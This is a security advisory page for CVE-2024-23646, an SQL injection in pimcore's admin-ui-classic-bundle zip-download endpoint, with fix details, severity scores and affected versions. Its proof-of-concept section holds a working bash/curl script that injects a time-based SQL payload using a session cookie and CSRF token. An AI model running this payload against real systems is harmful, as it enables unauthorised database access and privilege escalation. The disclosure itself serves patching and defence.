Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1jd3g2LTR3bWYtYzZ4ds4AA42l
SQL Injection in Admin download files as zip
Summary
The application allows to create zip files from available files on the site. The parameter "selectedIds", is susceptible to SQL Injection.
Details
downloadAsZipJobsAction escape parameters, but downloadAsZipAddFilesAction not.
The following code should be added:
foreach ($selectedIds as $selectedId) {
if ($selectedId) {
$quotedSelectedIds[] = $db->quote($selectedId);
}
}
PoC
- Set up an example project as described on https://github.com/pimcore/demon (demo package with example content)
- Log In. Grab the
X-pimcore-csrf-tokenheader from any request to the backend, as well as thePHPSESSIDcookie. - Run the following script, substituting the values accordingly:
#!/bin/bash
BASE_URL=http://localhost # REPLACE THIS!
CSRF_TOKEN="5133f9d5d28de7dbab39e33ac7036271284ee42e" # REPLACE THIS!
COOKIE="PHPSESSID=4312797207ba3b342b29218fa42f3aa3" # REPLACE THIS!
SQL="(select*from(select(sleep(6)))a)"
curl "${BASE_URL}/admin/asset/download-as-zip-add-files?_dc=1700573579093&id=1&selectedIds=1,${SQL}&offset=10&limit=5&jobId=655cb18a37b01" \
-X GET \
-H "X-pimcore-csrf-token: ${CSRF_TOKEN}" \
-H "Cookie: ${COOKIE}" `
- The response is delayed by 6 seconds.
Impact
Any backend user with very basic permissions can execute arbitrary SQL statements and thus alter any data or escalate their privileges to at least admin level.
Permalink: https://github.com/advisories/GHSA-cwx6-4wmf-c6xvJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jd3g2LTR3bWYtYzZ4ds4AA42l
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 12 months ago
Updated: 12 months ago
CVSS Score: 8.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS Percentage: 0.00077
EPSS Percentile: 0.35503
Identifiers: GHSA-cwx6-4wmf-c6xv, CVE-2024-23646
References:
- https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-cwx6-4wmf-c6xv
- https://github.com/pimcore/admin-ui-classic-bundle/commit/363afef29496cc40a8b863c2ca2338979fcf50a8
- https://nvd.nist.gov/vuln/detail/CVE-2024-23646
- https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2006
- https://github.com/pimcore/admin-ui-classic-bundle/blob/1.x/src/Controller/Admin/Asset/AssetController.php#L2087
- https://github.com/pimcore/admin-ui-classic-bundle/releases/tag/v1.3.2
- https://github.com/advisories/GHSA-cwx6-4wmf-c6xv
Blast Radius: 7.4
Affected Packages
packagist:pimcore/admin-ui-classic-bundle
Dependent packages: 28Dependent repositories: 7
Downloads: 566,739 total
Affected Version Ranges: >= 1.0.0, < 1.3.2
Fixed in: 1.3.2
All affected versions: 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.2.1, 1.2.2, 1.2.3, 1.3.0, 1.3.1
All unaffected versions: 1.3.2, 1.3.3, 1.3.4, 1.3.5, 1.4.0, 1.4.1, 1.4.2, 1.4.3, 1.4.4, 1.4.5, 1.5.0, 1.5.1, 1.5.2, 1.5.3, 1.5.4, 1.5.5, 1.6.0, 1.6.1, 1.6.2, 1.6.3, 1.6.4, 1.6.5, 1.6.6, 1.7.0, 1.7.1, 1.7.2, 1.7.3